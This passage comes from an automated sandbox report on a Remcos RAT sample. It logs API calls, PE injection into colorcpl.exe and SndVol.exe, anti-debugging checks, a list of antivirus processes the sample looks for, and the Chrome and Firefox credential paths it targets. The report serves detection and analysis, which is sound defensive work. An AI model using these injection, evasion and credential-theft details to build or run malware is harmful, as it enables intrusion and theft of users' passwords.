                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,5_2_0466C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,5_2_0466BD37
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046AE879 FindFirstFileExA,5_2_046AE879
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466783C FindFirstFileW,FindNextFileW,5_2_0466783C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,5_2_0466880C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04679AF5 FindFirstFileW,FindNextFileW,FindNextFileW,5_2_04679AF5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0466BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,5_2_0466BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,8_2_1C63BD37
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C67E879 FindFirstFileExA,8_2_1C67E879
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63783C FindFirstFileW,FindNextFileW,8_2_1C63783C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,8_2_1C63880C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C649AF5 FindFirstFileW,FindNextFileW,FindNextFileW,8_2_1C649AF5
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,8_2_1C63BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639665
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C639253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,8_2_1C639253
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C64C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,8_2_1C64C291
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C63C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,8_2_1C63C34D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04667C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,5_2_04667C97
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007BC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWYV
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP
                  Source: XY2I8rWLkM.exe, 00000000.00000002.2026131247.000000000078A000.00000004.00000020.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2026131247.00000000007BC000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000002.4443196477.0000000000475000.00000004.00000020.00020000.00000000.sdmp, colorcpl.exe, 00000005.00000003.2049726907.0000000000475000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                  Source: Ocihlomc.PIF, 00000007.00000002.2150286434.000000000089A000.00000004.00000020.00020000.00000000.sdmp, Ocihlomc.PIF, 0000000A.00000002.2210707182.0000000000991000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeAPI call chain: ExitProcess graph end nodegraph_0-33904
                  Source: C:\Windows\SysWOW64\colorcpl.exeAPI call chain: ExitProcess graph end nodegraph_5-98501
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_046949F9
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028B7AC0 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,0_2_028B7AC0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046A32B5 mov eax, dword ptr fs:[00000030h]5_2_046A32B5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_066E1179 mov eax, dword ptr fs:[00000030h]5_2_066E1179
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_066E1179 mov eax, dword ptr fs:[00000030h]5_2_066E1179
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_06723FC1 mov eax, dword ptr fs:[00000030h]5_2_06723FC1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04831179 mov eax, dword ptr fs:[00000030h]8_2_04831179
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04831179 mov eax, dword ptr fs:[00000030h]8_2_04831179
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_04873FC1 mov eax, dword ptr fs:[00000030h]8_2_04873FC1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6732B5 mov eax, dword ptr fs:[00000030h]8_2_1C6732B5
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04672077 GetProcessHeap,HeapFree,5_2_04672077
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04694FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_04694FDC
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046949F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_046949F9
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04694B47 SetUnhandledExceptionFilter,5_2_04694B47
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0469BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_0469BB22
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C664FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_1C664FDC
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C6649F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1C6649F9
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C664B47 SetUnhandledExceptionFilter,8_2_1C664B47
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: 8_2_1C66BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_1C66BB22

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Allocates memory in foreign processes
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000 protect: page execute and read and writeJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory allocated: C:\Windows\SysWOW64\SndVol.exe base: 4830000 protect: page execute and read and writeJump to behavior
                  Creates a thread in another existing process (thread injection)
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeThread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 66E15CFJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFThread created: C:\Windows\SysWOW64\SndVol.exe EIP: 48315CFJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4830000 value starts with: 4D5AJump to behavior
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeMemory written: C:\Windows\SysWOW64\colorcpl.exe base: 66E0000Jump to behavior
                  Source: C:\Users\Public\Libraries\Ocihlomc.PIFMemory written: C:\Windows\SysWOW64\SndVol.exe base: 4830000Jump to behavior
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe5_2_046720F7
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe8_2_1C6420F7
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04679627 mouse_event,5_2_04679627
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\184f
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerJ6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerm6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager96ca
                  Source: colorcpl.exe, 00000005.00000002.4443196477.000000000045F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerAI\26
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000448000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000451000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerlc6
                  Source: colorcpl.exe, 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, logs.dat.5.drBinary or memory string: [Program Manager]
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_04694C52 cpuid 5_2_04694C52
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028BD5D0
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5A90
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028C5FA0
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: GetLocaleInfoA,0_2_028AA780
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: GetLocaleInfoA,0_2_028AA7CC
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: lstrcpynA,GetThreadLocale,GetLocaleInfoA,lstrlenA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,lstrcpynA,LoadLibraryExA,0_2_028A5B9C
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: InetIsOffline,CoInitialize,CoUninitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,ExitProcess,0_2_028BD5D0
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,5_2_046B243C
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_046A8404
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_046B2543
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,5_2_046B2610
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_046B2036
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,5_2_046B20C3
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_046B2313
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,5_2_046B1CD8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_046B1F50
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: EnumSystemLocalesW,5_2_046B1F9B
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoW,5_2_046A88ED
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: GetLocaleInfoA,5_2_0466F8D1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,8_2_1C681CD8
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_1C681F50
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_1C681F9B
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_1C6788ED
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoA,8_2_1C63F8D1
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,8_2_1C68243C
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_1C678404
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_1C682543
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,8_2_1C682610
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: EnumSystemLocalesW,8_2_1C682036
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,8_2_1C6820C3
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: GetLocaleInfoW,8_2_1C682313
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028A91C8 GetLocalTime,0_2_028A91C8
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_0467B60D GetUserNameW,5_2_0467B60D
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 5_2_046A9190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,5_2_046A9190
                  Source: C:\Users\user\Desktop\XY2I8rWLkM.exeCode function: 0_2_028AB748 GetVersionExA,0_2_028AB748
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: cmdagent.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: quhlpsvc.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgamsvr.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: TMBMSRV.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: Vsserv.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgupsvc.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: avgemc.exe
                  Source: XY2I8rWLkM.exe, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013BC7000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000003.2012760229.000000007E670000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2035812165.0000000013B67000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2027190578.000000000228A000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2051616049.000000007FC10000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2048119983.000000007EA60000.00000004.00001000.00020000.00000000.sdmp, XY2I8rWLkM.exe, 00000000.00000002.2038640740.0000000014E1D000.00000004.00001000.00020000.00000000.sdmp, Ocihlomc.PIF, 00000007.00000002.2153760912.0000000002673000.00000004.00001000.00020000.00000000.sdmp, netutils.dll.0.drBinary or memory string: MsMpEng.exe

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000005.00000002.4443196477.0000000000407000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2153175404.00000000007AB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443582321.0000000004660000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2169542413.000000001C630000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000008.00000002.2154886005.0000000004830000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000005.00000002.4443972597.00000000066E0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2800, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 2380, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\ffrrdds\logs.dat, type: DROPPED
                  Contains functionality to steal Chrome passwords or cookies
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data5_2_0466BA12
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data8_2_1C63BA12
                  Contains functionality to steal Firefox passwords or cookies
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\5_2_0466BB30
                  Source: C:\Windows\SysWOW64\colorcpl.exeCode function: \key3.db5_2_0466BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\8_2_1C63BB30
                  Source: C:\Windows\SysWOW64\SndVol.exeCode function: \key3.db8_2_1C63BB30

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\SysWOW64\colorcpl.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TALGAIJump to behavior
                  Source: C:\Windows\SysWOW64\SndVol.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-TALGAIJump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.1c630000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.483190c.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e0000.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 8.2.SndVol.exe.4830000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.66e190c.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 5.2.colorcpl.exe.4660000.0.raw.unpack, type: UNPACKEDPE
